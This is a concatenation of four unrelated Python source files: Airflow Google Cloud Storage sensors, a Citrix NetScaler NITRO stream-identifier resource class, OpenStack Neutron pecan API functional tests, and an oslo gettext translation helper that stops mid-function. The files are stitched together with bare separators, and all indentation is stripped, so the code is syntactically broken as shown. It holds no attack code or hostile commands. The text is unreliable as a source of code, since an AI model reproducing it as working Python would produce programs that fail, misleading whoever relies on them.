# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
"""This module contains Google Cloud Storage sensors."""
import os
from datetime import datetime
from typing import Callable, List, Optional, Sequence, Set, Union
from airflow.exceptions import AirflowException
from airflow.providers.google.cloud.hooks.gcs import GCSHook
from airflow.sensors.base_sensor_operator import BaseSensorOperator, poke_mode_only
from airflow.utils.decorators import apply_defaults
class GCSObjectExistenceSensor(BaseSensorOperator):
"""
Checks for the existence of a file in Google Cloud Storage.
:param bucket: The Google Cloud Storage bucket where the object is.
:type bucket: str
:param object: The name of the object to check in the Google cloud
storage bucket.
:type object: str
:param google_cloud_conn_id: The connection ID to use when
connecting to Google Cloud Storage.
:type google_cloud_conn_id: str
:param delegate_to: The account to impersonate using domain-wide delegation of authority,
if any. For this to work, the service account making the request must have
domain-wide delegation enabled.
:type delegate_to: str
:param impersonation_chain: Optional service account to impersonate using short-term
credentials, or chained list of accounts required to get the access_token
of the last account in the list, which will be impersonated in the request.
If set as a string, the account must grant the originating account
the Service Account Token Creator IAM role.
If set as a sequence, the identities from the list must grant
Service Account Token Creator IAM role to the directly preceding identity, with first
account from the list granting this role to the originating account (templated).
:type impersonation_chain: Union[str, Sequence[str]]
"""
template_fields = (
'bucket',
'object',
'impersonation_chain',
)
ui_color = '#f0eee4'
@apply_defaults
def __init__(
self,
*,
bucket: str,
object: str, # pylint: disable=redefined-builtin
google_cloud_conn_id: str = 'google_cloud_default',
delegate_to: Optional[str] = None,
impersonation_chain: Optional[Union[str, Sequence[str]]] = None,
**kwargs,
) -> None:
super().__init__(**kwargs)
self.bucket = bucket
self.object = object
self.google_cloud_conn_id = google_cloud_conn_id
self.delegate_to = delegate_to
self.impersonation_chain = impersonation_chain
def poke(self, context: dict) -> bool:
self.log.info('Sensor checks existence of : %s, %s', self.bucket, self.object)
hook = GCSHook(
google_cloud_storage_conn_id=self.google_cloud_conn_id,
delegate_to=self.delegate_to,
impersonation_chain=self.impersonation_chain,
)
return hook.exists(self.bucket, self.object)
def ts_function(context):
"""
Default callback for the GoogleCloudStorageObjectUpdatedSensor. The default
behaviour is check for the object being updated after execution_date +
schedule_interval.
"""
return context['dag'].following_schedule(context['execution_date'])
class GCSObjectUpdateSensor(BaseSensorOperator):
"""
Checks if an object is updated in Google Cloud Storage.
:param bucket: The Google Cloud Storage bucket where the object is.
:type bucket: str
:param object: The name of the object to download in the Google cloud
storage bucket.
:type object: str
:param ts_func: Callback for defining the update condition. The default callback
returns execution_date + schedule_interval. The callback takes the context
as parameter.
:type ts_func: function
:param google_cloud_conn_id: The connection ID to use when
connecting to Google Cloud Storage.
:type google_cloud_conn_id: str
:param delegate_to: The account to impersonate using domain-wide delegation of authority,
if any. For this to work, the service account making the request must have
domain-wide delegation enabled.
:type delegate_to: str
:param impersonation_chain: Optional service account to impersonate using short-term
credentials, or chained list of accounts required to get the access_token
of the last account in the list, which will be impersonated in the request.
If set as a string, the account must grant the originating account
the Service Account Token Creator IAM role.
If set as a sequence, the identities from the list must grant
Service Account Token Creator IAM role to the directly preceding identity, with first
account from the list granting this role to the originating account (templated).
:type impersonation_chain: Union[str, Sequence[str]]
"""
template_fields = (
'bucket',
'object',
'impersonation_chain',
)
ui_color = '#f0eee4'
@apply_defaults
def __init__(
self,
bucket: str,
object: str, # pylint: disable=redefined-builtin
ts_func: Callable = ts_function,
google_cloud_conn_id: str = 'google_cloud_default',
delegate_to: Optional[str] = None,
impersonation_chain: Optional[Union[str, Sequence[str]]] = None,
**kwargs,
) -> None:
super().__init__(**kwargs)
self.bucket = bucket
self.object = object
self.ts_func = ts_func
self.google_cloud_conn_id = google_cloud_conn_id
self.delegate_to = delegate_to
self.impersonation_chain = impersonation_chain
def poke(self, context: dict) -> bool:
self.log.info('Sensor checks existence of : %s, %s', self.bucket, self.object)
hook = GCSHook(
google_cloud_storage_conn_id=self.google_cloud_conn_id,
delegate_to=self.delegate_to,
impersonation_chain=self.impersonation_chain,
)
return hook.is_updated_after(self.bucket, self.object, self.ts_func(context))
class GCSObjectsWtihPrefixExistenceSensor(BaseSensorOperator):
"""
Checks for the existence of GCS objects at a given prefix, passing matches via XCom.
When files matching the given prefix are found, the poke method's criteria will be
fulfilled and the matching objects will be returned from the operator and passed
through XCom for downstream tasks.
:param bucket: The Google Cloud Storage bucket where the object is.
:type bucket: str
:param prefix: The name of the prefix to check in the Google cloud
storage bucket.
:type prefix: str
:param google_cloud_conn_id: The connection ID to use when
connecting to Google Cloud Storage.
:type google_cloud_conn_id: str
:param delegate_to: The account to impersonate using domain-wide delegation of authority,
if any. For this to work, the service account making the request must have
domain-wide delegation enabled.
:type delegate_to: str
:param impersonation_chain: Optional service account to impersonate using short-term
credentials, or chained list of accounts required to get the access_token
of the last account in the list, which will be impersonated in the request.
If set as a string, the account must grant the originating account
the Service Account Token Creator IAM role.
If set as a sequence, the identities from the list must grant
Service Account Token Creator IAM role to the directly preceding identity, with first
account from the list granting this role to the originating account (templated).
:type impersonation_chain: Union[str, Sequence[str]]
"""
template_fields = (
'bucket',
'prefix',
'impersonation_chain',
)
ui_color = '#f0eee4'
@apply_defaults
def __init__(
self,
bucket: str,
prefix: str,
google_cloud_conn_id: str = 'google_cloud_default',
delegate_to: Optional[str] = None,
impersonation_chain: Optional[Union[str, Sequence[str]]] = None,
**kwargs,
) -> None:
super().__init__(**kwargs)
self.bucket = bucket
self.prefix = prefix
self.google_cloud_conn_id = google_cloud_conn_id
self.delegate_to = delegate_to
self._matches: List[str] = []
self.impersonation_chain = impersonation_chain
def poke(self, context: dict) -> bool:
self.log.info('Sensor checks existence of objects: %s, %s', self.bucket, self.prefix)
hook = GCSHook(
google_cloud_storage_conn_id=self.google_cloud_conn_id,
delegate_to=self.delegate_to,
impersonation_chain=self.impersonation_chain,
)
self._matches = hook.list(self.bucket, prefix=self.prefix)
return bool(self._matches)
def execute(self, context: dict) -> List[str]:
"""Overridden to allow matches to be passed"""
super().execute(context)
return self._matches
def get_time():
"""
This is just a wrapper of datetime.datetime.now to simplify mocking in the
unittests.
"""
return datetime.now()
@poke_mode_only
class GCSUploadSessionCompleteSensor(BaseSensorOperator):
"""
Checks for changes in the number of objects at prefix in Google Cloud Storage
bucket and returns True if the inactivity period has passed with no
increase in the number of objects. Note, this sensor will no behave correctly
in reschedule mode, as the state of the listed objects in the GCS bucket will
be lost between rescheduled invocations.
:param bucket: The Google Cloud Storage bucket where the objects are.
expected.
:type bucket: str
:param prefix: The name of the prefix to check in the Google cloud
storage bucket.
:param inactivity_period: The total seconds of inactivity to designate
an upload session is over. Note, this mechanism is not real time and
this operator may not return until a poke_interval after this period
has passed with no additional objects sensed.
:type inactivity_period: float
:param min_objects: The minimum number of objects needed for upload session
to be considered valid.
:type min_objects: int
:param previous_objects: The set of object ids found during the last poke.
:type previous_objects: set[str]
:param allow_delete: Should this sensor consider objects being deleted
between pokes valid behavior. If true a warning message will be logged
when this happens. If false an error will be raised.
:type allow_delete: bool
:param google_cloud_conn_id: The connection ID to use when connecting
to Google Cloud Storage.
:type google_cloud_conn_id: str
:param delegate_to: The account to impersonate using domain-wide delegation of authority,
if any. For this to work, the service account making the request must have
domain-wide delegation enabled.
:type delegate_to: str
:param impersonation_chain: Optional service account to impersonate using short-term
credentials, or chained list of accounts required to get the access_token
of the last account in the list, which will be impersonated in the request.
If set as a string, the account must grant the originating account
the Service Account Token Creator IAM role.
If set as a sequence, the identities from the list must grant
Service Account Token Creator IAM role to the directly preceding identity, with first
account from the list granting this role to the originating account (templated).
:type impersonation_chain: Union[str, Sequence[str]]
"""
template_fields = (
'bucket',
'prefix',
'impersonation_chain',
)
ui_color = '#f0eee4'
@apply_defaults
def __init__(
self,
bucket: str,
prefix: str,
inactivity_period: float = 60 * 60,
min_objects: int = 1,
previous_objects: Optional[Set[str]] = None,
allow_delete: bool = True,
google_cloud_conn_id: str = 'google_cloud_default',
delegate_to: Optional[str] = None,
impersonation_chain: Optional[Union[str, Sequence[str]]] = None,
**kwargs,
) -> None:
super().__init__(**kwargs)
self.bucket = bucket
self.prefix = prefix
if inactivity_period < 0:
raise ValueError("inactivity_period must be non-negative")
self.inactivity_period = inactivity_period
self.min_objects = min_objects
self.previous_objects = previous_objects if previous_objects else set()
self.inactivity_seconds = 0
self.allow_delete = allow_delete
self.google_cloud_conn_id = google_cloud_conn_id
self.delegate_to = delegate_to
self.last_activity_time = None
self.impersonation_chain = impersonation_chain
self.hook: Optional[GCSHook] = None
def _get_gcs_hook(self) -> Optional[GCSHook]:
if not self.hook:
self.hook = GCSHook(
gcp_conn_id=self.google_cloud_conn_id,
delegate_to=self.delegate_to,
impersonation_chain=self.impersonation_chain,
)
return self.hook
def is_bucket_updated(self, current_objects: Set[str]) -> bool:
"""
Checks whether new objects have been uploaded and the inactivity_period
has passed and updates the state of the sensor accordingly.
:param current_objects: set of object ids in bucket during last poke.
:type current_objects: set[str]
"""
current_num_objects = len(current_objects)
if current_objects > self.previous_objects:
# When new objects arrived, reset the inactivity_seconds
# and update previous_objects for the next poke.
self.log.info(
"New objects found at %s resetting last_activity_time.",
os.path.join(self.bucket, self.prefix),
)
self.log.debug("New objects: %s", "\n".join(current_objects - self.previous_objects))
self.last_activity_time = get_time()
self.inactivity_seconds = 0
self.previous_objects = current_objects
return False
if self.previous_objects - current_objects:
# During the last poke interval objects were deleted.
if self.allow_delete:
self.previous_objects = current_objects
self.last_activity_time = get_time()
self.log.warning(
"""
Objects were deleted during the last
poke interval. Updating the file counter and
resetting last_activity_time.
%s
""",
self.previous_objects - current_objects,
)
return False
raise AirflowException(
"""
Illegal behavior: objects were deleted in {} between pokes.
""".format(
os.path.join(self.bucket, self.prefix)
)
)
if self.last_activity_time:
self.inactivity_seconds = (get_time() - self.last_activity_time).total_seconds()
else:
# Handles the first poke where last inactivity time is None.
self.last_activity_time = get_time()
self.inactivity_seconds = 0
if self.inactivity_seconds >= self.inactivity_period:
path = os.path.join(self.bucket, self.prefix)
if current_num_objects >= self.min_objects:
self.log.info(
"""SUCCESS:
Sensor found %s objects at %s.
Waited at least %s seconds, with no new objects dropped.
""",
current_num_objects,
path,
self.inactivity_period,
)
return True
self.log.error("FAILURE: Inactivity Period passed, not enough objects found in %s", path)
return False
return False
def poke(self, context: dict) -> bool:
return self.is_bucket_updated(
set(self._get_gcs_hook().list(self.bucket, prefix=self.prefix)) # type: ignore[union-attr]
)
| |
#
# Copyright (c) 2008-2015 Citrix Systems, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License")
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from nssrc.com.citrix.netscaler.nitro.resource.base.base_resource import base_resource
from nssrc.com.citrix.netscaler.nitro.resource.base.base_resource import base_response
from nssrc.com.citrix.netscaler.nitro.service.options import options
from nssrc.com.citrix.netscaler.nitro.exception.nitro_exception import nitro_exception
from nssrc.com.citrix.netscaler.nitro.util.nitro_util import nitro_util
class streamidentifier(base_resource) :
""" Configuration for identifier resource. """
def __init__(self) :
self._name = ""
self._selectorname = ""
self._interval = 0
self._samplecount = 0
self._sort = ""
self._rule = []
self.___count = 0
@property
def name(self) :
"""The name of stream identifier.
"""
try :
return self._name
except Exception as e:
raise e
@name.setter
def name(self, name) :
"""The name of stream identifier.
"""
try :
self._name = name
except Exception as e:
raise e
@property
def selectorname(self) :
"""Name of the selector to use with the stream identifier.<br/>Minimum length = 1.
"""
try :
return self._selectorname
except Exception as e:
raise e
@selectorname.setter
def selectorname(self, selectorname) :
"""Name of the selector to use with the stream identifier.<br/>Minimum length = 1
"""
try :
self._selectorname = selectorname
except Exception as e:
raise e
@property
def interval(self) :
"""Number of minutes of data to use when calculating session statistics (number of requests, bandwidth, and response times). The interval is a moving window that keeps the most recently collected data. Older data is discarded at regular intervals.<br/>Default value: 1<br/>Minimum length = 1.
"""
try :
return self._interval
except Exception as e:
raise e
@interval.setter
def interval(self, interval) :
"""Number of minutes of data to use when calculating session statistics (number of requests, bandwidth, and response times). The interval is a moving window that keeps the most recently collected data. Older data is discarded at regular intervals.<br/>Default value: 1<br/>Minimum length = 1
"""
try :
self._interval = interval
except Exception as e:
raise e
@property
def samplecount(self) :
"""Size of the sample from which to select a request for evaluation. The smaller the sample count, the more accurate is the statistical data. To evaluate all requests, set the sample count to 1. However, such a low setting can result in excessive consumption of memory and processing resources.<br/>Default value: 1<br/>Minimum length = 1<br/>Maximum length = 65535.
"""
try :
return self._samplecount
except Exception as e:
raise e
@samplecount.setter
def samplecount(self, samplecount) :
"""Size of the sample from which to select a request for evaluation. The smaller the sample count, the more accurate is the statistical data. To evaluate all requests, set the sample count to 1. However, such a low setting can result in excessive consumption of memory and processing resources.<br/>Default value: 1<br/>Minimum length = 1<br/>Maximum length = 65535
"""
try :
self._samplecount = samplecount
except Exception as e:
raise e
@property
def sort(self) :
"""Sort stored records by the specified statistics column, in descending order. Performed during data collection, the sorting enables real-time data evaluation through NetScaler policies (for example, compression and caching policies) that use functions such as IS_TOP(n).<br/>Default value: REQUESTS<br/>Possible values = REQUESTS, CONNECTIONS, RESPTIME, BANDWIDTH, NONE.
"""
try :
return self._sort
except Exception as e:
raise e
@sort.setter
def sort(self, sort) :
"""Sort stored records by the specified statistics column, in descending order. Performed during data collection, the sorting enables real-time data evaluation through NetScaler policies (for example, compression and caching policies) that use functions such as IS_TOP(n).<br/>Default value: REQUESTS<br/>Possible values = REQUESTS, CONNECTIONS, RESPTIME, BANDWIDTH, NONE
"""
try :
self._sort = sort
except Exception as e:
raise e
@property
def rule(self) :
"""Rule.
"""
try :
return self._rule
except Exception as e:
raise e
def _get_nitro_response(self, service, response) :
""" converts nitro response into object and returns the object array in case of get request.
"""
try :
result = service.payload_formatter.string_to_resource(streamidentifier_response, response, self.__class__.__name__)
if(result.errorcode != 0) :
if (result.errorcode == 444) :
service.clear_session(self)
if result.severity :
if (result.severity == "ERROR") :
raise nitro_exception(result.errorcode, str(result.message), str(result.severity))
else :
raise nitro_exception(result.errorcode, str(result.message), str(result.severity))
return result.streamidentifier
except Exception as e :
raise e
def _get_object_name(self) :
""" Returns the value of object identifier argument
"""
try :
if (self.name) :
return str(self.name)
return None
except Exception as e :
raise e
@classmethod
def add(cls, client, resource) :
""" Use this API to add streamidentifier.
"""
try :
if type(resource) is not list :
addresource = streamidentifier()
addresource.name = resource.name
addresource.selectorname = resource.selectorname
addresource.interval = resource.interval
addresource.samplecount = resource.samplecount
addresource.sort = resource.sort
return addresource.add_resource(client)
else :
if (resource and len(resource) > 0) :
addresources = [ streamidentifier() for _ in range(len(resource))]
for i in range(len(resource)) :
addresources[i].name = resource[i].name
addresources[i].selectorname = resource[i].selectorname
addresources[i].interval = resource[i].interval
addresources[i].samplecount = resource[i].samplecount
addresources[i].sort = resource[i].sort
result = cls.add_bulk_request(client, addresources)
return result
except Exception as e :
raise e
@classmethod
def update(cls, client, resource) :
""" Use this API to update streamidentifier.
"""
try :
if type(resource) is not list :
updateresource = streamidentifier()
updateresource.name = resource.name
updateresource.selectorname = resource.selectorname
updateresource.interval = resource.interval
updateresource.samplecount = resource.samplecount
updateresource.sort = resource.sort
return updateresource.update_resource(client)
else :
if (resource and len(resource) > 0) :
updateresources = [ streamidentifier() for _ in range(len(resource))]
for i in range(len(resource)) :
updateresources[i].name = resource[i].name
updateresources[i].selectorname = resource[i].selectorname
updateresources[i].interval = resource[i].interval
updateresources[i].samplecount = resource[i].samplecount
updateresources[i].sort = resource[i].sort
result = cls.update_bulk_request(client, updateresources)
return result
except Exception as e :
raise e
@classmethod
def unset(cls, client, resource, args) :
""" Use this API to unset the properties of streamidentifier resource.
Properties that need to be unset are specified in args array.
"""
try :
if type(resource) is not list :
unsetresource = streamidentifier()
if type(resource) != type(unsetresource):
unsetresource.name = resource
else :
unsetresource.name = resource.name
return unsetresource.unset_resource(client, args)
else :
if type(resource[0]) != cls :
if (resource and len(resource) > 0) :
unsetresources = [ streamidentifier() for _ in range(len(resource))]
for i in range(len(resource)) :
unsetresources[i].name = resource[i]
else :
if (resource and len(resource) > 0) :
unsetresources = [ streamidentifier() for _ in range(len(resource))]
for i in range(len(resource)) :
unsetresources[i].name = resource[i].name
result = cls.unset_bulk_request(client, unsetresources, args)
return result
except Exception as e :
raise e
@classmethod
def delete(cls, client, resource) :
""" Use this API to delete streamidentifier.
"""
try :
if type(resource) is not list :
deleteresource = streamidentifier()
if type(resource) != type(deleteresource):
deleteresource.name = resource
else :
deleteresource.name = resource.name
return deleteresource.delete_resource(client)
else :
if type(resource[0]) != cls :
if (resource and len(resource) > 0) :
deleteresources = [ streamidentifier() for _ in range(len(resource))]
for i in range(len(resource)) :
deleteresources[i].name = resource[i]
else :
if (resource and len(resource) > 0) :
deleteresources = [ streamidentifier() for _ in range(len(resource))]
for i in range(len(resource)) :
deleteresources[i].name = resource[i].name
result = cls.delete_bulk_request(client, deleteresources)
return result
except Exception as e :
raise e
@classmethod
def get(cls, client, name="", option_="") :
""" Use this API to fetch all the streamidentifier resources that are configured on netscaler.
"""
try :
if not name :
obj = streamidentifier()
response = obj.get_resources(client, option_)
else :
if type(name) != cls :
if type(name) is not list :
obj = streamidentifier()
obj.name = name
response = obj.get_resource(client, option_)
else :
if name and len(name) > 0 :
response = [streamidentifier() for _ in range(len(name))]
obj = [streamidentifier() for _ in range(len(name))]
for i in range(len(name)) :
obj[i] = streamidentifier()
obj[i].name = name[i]
response[i] = obj[i].get_resource(client, option_)
return response
except Exception as e :
raise e
@classmethod
def get_filtered(cls, client, filter_) :
""" Use this API to fetch filtered set of streamidentifier resources.
filter string should be in JSON format.eg: "port:80,servicetype:HTTP".
"""
try :
obj = streamidentifier()
option_ = options()
option_.filter = filter_
response = obj.getfiltered(client, option_)
return response
except Exception as e :
raise e
@classmethod
def count(cls, client) :
""" Use this API to count the streamidentifier resources configured on NetScaler.
"""
try :
obj = streamidentifier()
option_ = options()
option_.count = True
response = obj.get_resources(client, option_)
if response :
return response[0].__dict__['___count']
return 0
except Exception as e :
raise e
@classmethod
def count_filtered(cls, client, filter_) :
""" Use this API to count filtered the set of streamidentifier resources.
Filter string should be in JSON format.eg: "port:80,servicetype:HTTP".
"""
try :
obj = streamidentifier()
option_ = options()
option_.count = True
option_.filter = filter_
response = obj.getfiltered(client, option_)
if response :
return response[0].__dict__['___count']
return 0
except Exception as e :
raise e
class Sort:
REQUESTS = "REQUESTS"
CONNECTIONS = "CONNECTIONS"
RESPTIME = "RESPTIME"
BANDWIDTH = "BANDWIDTH"
NONE = "NONE"
class streamidentifier_response(base_response) :
def __init__(self, length=1) :
self.streamidentifier = []
self.errorcode = 0
self.message = ""
self.severity = ""
self.sessionid = ""
self.streamidentifier = [streamidentifier() for _ in range(length)]
| |
# Copyright (c) 2015 Mirantis, Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import os
import mock
from oslo_config import cfg
from oslo_serialization import jsonutils
from oslo_utils import uuidutils
from pecan import request
from pecan import set_config
from pecan.testing import load_test_app
import testtools
from neutron.api import extensions
from neutron.api.v2 import attributes
from neutron.common import exceptions as n_exc
from neutron import context
from neutron import manager
from neutron.pecan_wsgi.controllers import root as controllers
from neutron.tests.unit import testlib_api
class PecanFunctionalTest(testlib_api.SqlTestCase):
def setUp(self):
self.setup_coreplugin('neutron.plugins.ml2.plugin.Ml2Plugin')
super(PecanFunctionalTest, self).setUp()
self.addCleanup(extensions.PluginAwareExtensionManager.clear_instance)
self.addCleanup(set_config, {}, overwrite=True)
self.set_config_overrides()
self.setup_app()
def setup_app(self):
self.app = load_test_app(os.path.join(
os.path.dirname(__file__),
'config.py'
))
self._gen_port()
def _gen_port(self):
pl = manager.NeutronManager.get_plugin()
network_id = pl.create_network(context.get_admin_context(), {
'network':
{'name': 'pecannet', 'tenant_id': 'tenid', 'shared': False,
'admin_state_up': True, 'status': 'ACTIVE'}})['id']
self.port = pl.create_port(context.get_admin_context(), {
'port':
{'tenant_id': 'tenid', 'network_id': network_id,
'fixed_ips': attributes.ATTR_NOT_SPECIFIED,
'mac_address': '00:11:22:33:44:55',
'admin_state_up': True, 'device_id': 'FF',
'device_owner': 'pecan', 'name': 'pecan'}})
def set_config_overrides(self):
cfg.CONF.set_override('auth_strategy', 'noauth')
class TestV2Controller(PecanFunctionalTest):
def test_get(self):
response = self.app.get('/v2.0/ports.json')
self.assertEqual(response.status_int, 200)
def test_post(self):
response = self.app.post_json('/v2.0/ports.json',
params={'port': {'network_id': self.port['network_id'],
'admin_state_up': True,
'tenant_id': 'tenid'}},
headers={'X-Tenant-Id': 'tenid'})
self.assertEqual(response.status_int, 201)
def test_put(self):
response = self.app.put_json('/v2.0/ports/%s.json' % self.port['id'],
params={'port': {'name': 'test'}},
headers={'X-Tenant-Id': 'tenid'})
self.assertEqual(response.status_int, 200)
def test_delete(self):
response = self.app.delete('/v2.0/ports/%s.json' % self.port['id'],
headers={'X-Tenant-Id': 'tenid'})
self.assertEqual(response.status_int, 204)
def test_plugin_initialized(self):
self.assertIsNotNone(manager.NeutronManager._instance)
def test_get_extensions(self):
response = self.app.get('/v2.0/extensions.json')
self.assertEqual(response.status_int, 200)
def test_get_specific_extension(self):
response = self.app.get('/v2.0/extensions/allowed-address-pairs.json')
self.assertEqual(response.status_int, 200)
class TestErrors(PecanFunctionalTest):
def test_404(self):
response = self.app.get('/assert_called_once', expect_errors=True)
self.assertEqual(response.status_int, 404)
def test_bad_method(self):
response = self.app.patch('/v2.0/ports/44.json',
expect_errors=True)
self.assertEqual(response.status_int, 405)
class TestRequestID(PecanFunctionalTest):
def test_request_id(self):
response = self.app.get('/')
self.assertIn('x-openstack-request-id', response.headers)
self.assertTrue(
response.headers['x-openstack-request-id'].startswith('req-'))
id_part = response.headers['x-openstack-request-id'].split('req-')[1]
self.assertTrue(uuidutils.is_uuid_like(id_part))
class TestKeystoneAuth(PecanFunctionalTest):
def set_config_overrides(self):
# default auth strategy is keystone so we pass
pass
def test_auth_enforced(self):
response = self.app.get('/', expect_errors=True)
self.assertEqual(response.status_int, 401)
class TestInvalidAuth(PecanFunctionalTest):
def setup_app(self):
# disable normal app setup since it will fail
pass
def test_invalid_auth_strategy(self):
cfg.CONF.set_override('auth_strategy', 'badvalue')
with testtools.ExpectedException(n_exc.InvalidConfigurationOption):
load_test_app(os.path.join(os.path.dirname(__file__), 'config.py'))
class TestExceptionTranslationHook(PecanFunctionalTest):
def test_neutron_nonfound_to_webob_exception(self):
# this endpoint raises a Neutron notfound exception. make sure it gets
# translated into a 404 error
with mock.patch(
'neutron.pecan_wsgi.controllers.root.CollectionsController.get',
side_effect=n_exc.NotFound()
):
response = self.app.get('/v2.0/ports.json', expect_errors=True)
self.assertEqual(response.status_int, 404)
def test_unexpected_exception(self):
with mock.patch(
'neutron.pecan_wsgi.controllers.root.CollectionsController.get',
side_effect=ValueError('secretpassword')
):
response = self.app.get('/v2.0/ports.json', expect_errors=True)
self.assertNotIn(response.body, 'secretpassword')
self.assertEqual(response.status_int, 500)
class TestRequestPopulatingHooks(PecanFunctionalTest):
def setUp(self):
super(TestRequestPopulatingHooks, self).setUp()
# request.context is thread-local storage so it has to be accessed by
# the controller. We can capture it into a list here to assert on after
# the request finishes.
def capture_request_details(*args, **kwargs):
self.req_stash = {
'context': request.context['neutron_context'],
'resource_type': request.context['resource'],
}
mock.patch(
'neutron.pecan_wsgi.controllers.root.CollectionsController.get',
side_effect=capture_request_details
).start()
# TODO(kevinbenton): add context tests for X-Roles etc
def test_context_set_in_request(self):
self.app.get('/v2.0/ports.json',
headers={'X-Tenant-Id': 'tenant_id'})
self.assertEqual('tenant_id', self.req_stash['context'].tenant_id)
def test_core_resource_identified(self):
self.app.get('/v2.0/ports.json')
self.assertEqual('port', self.req_stash['resource_type'])
def test_service_plugin_identified(self):
# TODO(kevinbenton): fix the unit test setup to include an l3 plugin
self.skipTest("A dummy l3 plugin needs to be setup")
self.app.get('/v2.0/routers.json')
self.assertEqual('router', self.req_stash['resource_type'])
# make sure the core plugin was identified as the handler for ports
self.assertEqual(
manager.NeutronManager.get_service_plugins()['L3_ROUTER_NAT'],
self.req_stash['plugin'])
class TestEnforcementHooks(PecanFunctionalTest):
def test_network_ownership_check(self):
# TODO(kevinbenton): get a scenario that passes attribute population
self.skipTest("Attribute population blocks this test as-is")
response = self.app.post_json('/v2.0/ports.json',
params={'port': {'network_id': self.port['network_id'],
'admin_state_up': True,
'tenant_id': 'tenid2'}},
headers={'X-Tenant-Id': 'tenid'})
self.assertEqual(response.status_int, 200)
def test_quota_enforcement(self):
# TODO(kevinbenton): this test should do something
pass
def test_policy_enforcement(self):
# TODO(kevinbenton): this test should do something
pass
class TestRootController(PecanFunctionalTest):
"""Test version listing on root URI."""
def test_get(self):
response = self.app.get('/')
self.assertEqual(response.status_int, 200)
json_body = jsonutils.loads(response.body)
versions = json_body.get('versions')
self.assertEqual(1, len(versions))
for (attr, value) in controllers.V2Controller.version_info.items():
self.assertIn(attr, versions[0])
self.assertEqual(value, versions[0][attr])
def _test_method_returns_405(self, method):
api_method = getattr(self.app, method)
response = api_method('/', expect_errors=True)
self.assertEqual(response.status_int, 405)
def test_post(self):
self._test_method_returns_405('post')
def test_put(self):
self._test_method_returns_405('put')
def test_patch(self):
self._test_method_returns_405('patch')
def test_delete(self):
self._test_method_returns_405('delete')
def test_head(self):
self._test_method_returns_405('head')
| |
# Copyright 2012 Red Hat, Inc.
# Copyright 2013 IBM Corp.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
gettext for openstack-common modules.
Usual usage in an openstack.common module:
from oslo.utils.openstack.common.gettextutils import _
"""
import copy
import functools
import gettext
import locale
from logging import handlers
import os
from babel import localedata
import six
_AVAILABLE_LANGUAGES = {}
# FIXME(dhellmann): Remove this when moving to oslo.i18n.
USE_LAZY = False
class TranslatorFactory(object):
"""Create translator functions
"""
def __init__(self, domain, lazy=False, localedir=None):
"""Establish a set of translation functions for the domain.
:param domain: Name of translation domain,
specifying a message catalog.
:type domain: str
:param lazy: Delays translation until a message is emitted.
Defaults to False.
:type lazy: Boolean
:param localedir: Directory with translation catalogs.
:type localedir: str
"""
self.domain = domain
self.lazy = lazy
if localedir is None:
localedir = os.environ.get(domain.upper() + '_LOCALEDIR')
self.localedir = localedir
def _make_translation_func(self, domain=None):
"""Return a new translation function ready for use.
Takes into account whether or not lazy translation is being
done.
The domain can be specified to override the default from the
factory, but the localedir from the factory is always used
because we assume the log-level translation catalogs are
installed in the same directory as the main application
catalog.
"""
if domain is None:
domain = self.domain
if self.lazy:
return functools.partial(Message, domain=domain)
t = gettext.translation(
domain,
localedir=self.localedir,
fallback=True,
)
if six.PY3:
return t.gettext
return t.ugettext
@property
def primary(self):
"The default translation function."
return self._make_translation_func()
def _make_log_translation_func(self, level):
return self._make_translation_func(self.domain + '-log-' + level)
@property
def log_info(self):
"Translate info-level log messages."
return self._make_log_translation_func('info')
@property
def log_warning(self):
"Translate warning-level log messages."
return self._make_log_translation_func('warning')
@property
def log_error(self):
"Translate error-level log messages."
return self._make_log_translation_func('error')
@property
def log_critical(self):
"Translate critical-level log messages."
return self._make_log_translation_func('critical')
# NOTE(dhellmann): When this module moves out of the incubator into
# oslo.i18n, these global variables can be moved to an integration
# module within each application.
# Create the global translation functions.
_translators = TranslatorFactory('oslo.utils')
# The primary translation function using the well-known name "_"
_ = _translators.primary
# Translators for log levels.
#
# The abbreviated names are meant to reflect the usual use of a short
# name like '_'. The "L" is for "log" and the other letter comes from
# the level.
_LI = _translators.log_info
_LW = _translators.log_warning
_LE = _translators.log_error
_LC = _translators.log_critical
# NOTE(dhellmann): End of globals that will move to the application's
# integration module.
def enable_lazy():
"""Convenience function for configuring _() to use lazy gettext
Call this at the start of execution to enable the gettextutils._
function to use lazy gettext functionality. This is useful if
your project is importing _ directly instead of using the
gettextutils.install() way of importing the _ function.
"""
# FIXME(dhellmann): This function will be removed in oslo.i18n,
# because the TranslatorFactory makes it superfluous.
global _, _LI, _LW, _LE, _LC, USE_LAZY
tf = TranslatorFactory('oslo.utils', lazy=True)
_ = tf.primary
_LI = tf.log_info
_LW = tf.log_warning
_LE = tf.log_error
_LC = tf.log_critical
USE_LAZY = True
def install(domain, lazy=False):
"""Install a _() function using the given translation domain.
Given a translation domain, install a _() function using gettext's
install() function.
The main difference from gettext.install() is that we allow
overriding the default localedir (e.g. /usr/share/locale) using
a translation-domain-specific environment variable (e.g.
NOVA_LOCALEDIR).
:param domain: the translation domain
:param lazy: indicates whether or not to install the lazy _() function.
The lazy _() introduces a way to do deferred translation
of messages by installing a _ that builds Message objects,
instead of strings, which can then be lazily translated into
any available locale.
"""
if lazy:
from six import moves
